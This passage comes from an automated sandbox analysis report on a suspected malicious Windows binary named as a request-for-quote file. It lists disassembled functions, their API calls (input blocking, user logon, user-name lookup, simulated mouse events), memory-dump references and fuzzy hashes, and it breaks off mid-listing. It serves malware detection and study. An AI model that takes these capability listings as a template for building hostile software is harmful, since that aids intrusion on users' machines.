                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 5e16b46768f34ddaba963a73b6cb40fde64ffbfecab06688d75e55e08dcabe29
                    • Instruction ID: 3a7e1b37296ca40ed1030ff67921264bad7f8c20cba5186bac23eafa8e71467f
                    • Opcode Fuzzy Hash: 5e16b46768f34ddaba963a73b6cb40fde64ffbfecab06688d75e55e08dcabe29
                    • Instruction Fuzzy Hash: 8BE08C32000601EFEB212B21ED08E737BE9EF00390724893DF4A6D0430DB23AC90EB10
                    Function 00E9A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F97,?,?,?,00000001), ref: 00E9A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                    • Instruction ID: 898a0f0a8d82cde60c61cbfe15c3982d9f87859cfd1fe2a200c39f023561fcc0
                    • Opcode Fuzzy Hash: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
                    • Instruction Fuzzy Hash: 1DB09231055208AFCA102B92EC09BA83F6AEF84AA2F404020F60D94060EB625454CA95
                    Function 00E9F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                    • Instruction ID: 0bdc4877c84d47f63c596da6b0c3431c895fa5e12972ce2df737262353e7dad0
                    • Opcode Fuzzy Hash: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
                    • Instruction Fuzzy Hash: 55321562D69F054DDB23A634D832336B248AFB73D4F15E737E819F59AAEB28D4835100
                    Function 00EA267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                    • Instruction ID: b0c45ff74c3257430dff48638cc421c35fe2200d2c55e16288a5784cf2f9ad5a
                    • Opcode Fuzzy Hash: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
                    • Instruction Fuzzy Hash: 95B1FF20E2AF454DD32396398831336BA9CBFBB2D5F52D71BFC2674D62EB2285835141
                    Function 00ED8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 00ED8B25
                      • Part of subcall function 00E9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00ED91F8,00000000,?,?,?,?,00ED93A9,00000000,?), ref: 00E95443
                      • Part of subcall function 00E9543A: __aulldiv.LIBCMT ref: 00E95463
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                    • Instruction ID: 97bc6d92407ff2a56ed0708dd5f2f97723bbd857ecc88d3c7e314c3683c8788e
                    • Opcode Fuzzy Hash: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
                    • Instruction Fuzzy Hash: 4E21E472635614CFC729CF29D841B52B3E1EBA4321B289E6DD0F5CB2D0CA34B945DB94
                    Function 00EE41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 00EE4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                    • Instruction ID: 444afd6b7b122cc6707724f159413acdd514ac82b50304e12d24871aa77944b6
                    • Opcode Fuzzy Hash: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
                    • Instruction Fuzzy Hash: 2DE04FB12402189FC710EF5AD844A9AF7E8AF98760F01D026FD49E7362DA70E841CBA0
                    Function 00ED4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ED4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                    • Instruction ID: 6911663978468385fb8ac7df73d0ffe2ee4c1afca8cd9d81a0fb8cef29ced08d
                    • Opcode Fuzzy Hash: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
                    • Instruction Fuzzy Hash: FAD05EF03642053FFC284B20AC0FFB60208E3A0785F84798B7201B96E1A8F16C02E035
                    Function 00EC8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC88D1), ref: 00EC8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                    • Instruction ID: 6a6306f716ffbc54628e2d296d6a4cb36a7b222ab39ffd0a6fa98da841a7433d
                    • Opcode Fuzzy Hash: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
                    • Instruction Fuzzy Hash: ABD05E3226050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15D50A1C775D835EB60
                    Function 00EB2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00EB2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                    • Instruction ID: bef88859a715bdbd02b822b5612ab5575e4f15a98092b5b8965cdf3cb3ed9353
                    • Opcode Fuzzy Hash: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
                    • Instruction Fuzzy Hash: E6C002B1810109DBDB05DB90D998DEA77BCAB04314F504095A101B2100DA749B448A61
                    Function 00E9A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
                    • Instruction ID: aa7aabf9fa592efd86b9ab76201eb1045df34d03a1a7d742b7b0972e56258830
                    • Opcode Fuzzy Hash: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
                    • Instruction Fuzzy Hash: 47A0113000020CAB8A002B82EC088A8BFAEEB802A0B008020F80C80022AB32A8208A80
                    Function 00E88A0E Relevance: .6, Instructions: 608COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                    • Instruction ID: 1f9c3f10f852df1f88d0ed1adfc12f82930bdeefd2846c1a424a7026e4cd9cfc
                    • Opcode Fuzzy Hash: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                    • Instruction Fuzzy Hash: 5B224B31501615CBCF38AB14C684BBDB7A1EB41308FA8646EDC4EBB195DB35ADC2CB61
                    Function 00E92405 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: cdf395f0c1bb5cc714151f374cff440326fa30ad45b97363a6244af8b6158689
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 45C1C5322051930ADF2D8639D43407EFBE15EA27B531A279EE4B3EB5C5EF20D524E620
                    Function 00E9283A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: c2d1b590c332fab5f15ebc501592d3e6ae7e0c71fc16d94daca16b6f8737eba6
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: F4C182332051930ADF6D463AD43413EBBE15FA27B531A27ADE4B2EB5D4EF20D524E620
                    Function 00E91BB8 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 5a759a86e6c4a3628fca9058091bb28e7fdeac0a9a4de2790891e426344af8ca
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 3FC1833630919309DF2D463A943407EFAE15EA27B531A27EDE4B3EB5D4EF20D524D610
                    Function 00EF37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,00EFF910), ref: 00EF38AF
                    • IsWindowVisible.USER32(?), ref: 00EF38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                    • Instruction ID: 638ca269279c19235862ab94c55b953870d75bffe19faef8f61d628f382ef0c0
                    • Opcode Fuzzy Hash: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                    • Instruction Fuzzy Hash: B9D17F302043099FCB14EF24C551ABAB7E1AF94354F11A45CB9867B3A3CB31EE4ACB91
                    Function 00EFA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00EFA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00EFA8D0
                    • GetSysColor.USER32(0000000F), ref: 00EFA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00EFA8F6
                    • SelectObject.GDI32(?,?), ref: 00EFA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFA930
                    • GetSysColor.USER32(00000010), ref: 00EFA938
                    • CreateSolidBrush.GDI32(00000000), ref: 00EFA93F
                    • FrameRect.USER32(?,?,00000000), ref: 00EFA94E
                    • DeleteObject.GDI32(00000000), ref: 00EFA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00EFA9A0
                    • FillRect.USER32(?,?,?), ref: 00EFA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFA9FD
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(00000012), ref: 00EFAB99
                      • Part of subcall function 00EFAB60: SetTextColor.GDI32(?,?), ref: 00EFAB9D
                      • Part of subcall function 00EFAB60: GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(0000000F), ref: 00EFABBE
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(00000011), ref: 00EFABDB
                      • Part of subcall function 00EFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                      • Part of subcall function 00EFAB60: SelectObject.GDI32(?,00000000), ref: 00EFABFA
                      • Part of subcall function 00EFAB60: SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                      • Part of subcall function 00EFAB60: SelectObject.GDI32(?,?), ref: 00EFAC10
                      • Part of subcall function 00EFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                      • Part of subcall function 00EFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                      • Part of subcall function 00EFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 23c06a5be5fd44a9bf95fd20b1db24a761322c1ad1859a14f17dac64ff373c13
                    • Instruction ID: 3a1106b629c837409487dfb53a1e7c769e8206ff4a5500ac41f83faf99fd8574
                    • Opcode Fuzzy Hash: 23c06a5be5fd44a9bf95fd20b1db24a761322c1ad1859a14f17dac64ff373c13
                    • Instruction Fuzzy Hash: 1FA1B1B1008305BFD7109F65DC08E7B7BA9FF88321F145A39FA66AA1A1C771D948CB52
                    Function 00E72C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E72CA2
                    • DeleteObject.GDI32(00000000), ref: 00E72CE8
                    • DeleteObject.GDI32(00000000), ref: 00E72CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00E72CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E72D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC68B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACAED
                      • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                    • SendMessageW.USER32(?,00001053), ref: 00EACB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACB41
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB57
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                    • Instruction ID: 620ec5bb11378ba942a3253c1e57b55f6bd382280c1a5c4df46c9b7f9cf57b0e
                    • Opcode Fuzzy Hash: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                    • Instruction Fuzzy Hash: 58128E30604201AFDB15CF24C884BA9B7E5BF5A304F64A569F599EF262CB31FC45CB91
                    Function 00EE77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00EE77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7946
